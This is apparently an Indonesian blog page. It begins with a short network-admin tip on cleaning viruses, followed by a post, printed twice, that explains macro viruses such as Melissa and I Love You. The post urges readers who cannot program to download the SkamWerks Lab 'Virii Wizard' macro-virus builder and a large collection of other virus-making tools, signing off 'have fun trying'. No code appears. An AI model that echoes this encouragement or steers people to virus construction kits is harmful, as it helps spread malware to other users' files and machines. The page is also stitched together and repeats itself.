Jika Anda adalah Admin jaringan, sebaiknya Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!). Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.
stkip muhammadiyah lumajang
Membuat virus macro sendiri
Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.
Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.
Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?
Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.
Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus di sini. Koleksinya sangat lengkap!
Selamat mencoba!
Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.
Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.
Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?
Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.
Jika berminat, Anda bisa mendapatkan software-software lain yang dapat digunakan untuk membuat virus di sini. Koleksinya sangat lengkap!
Selamat mencoba!
Langganan:
Postingan (Atom)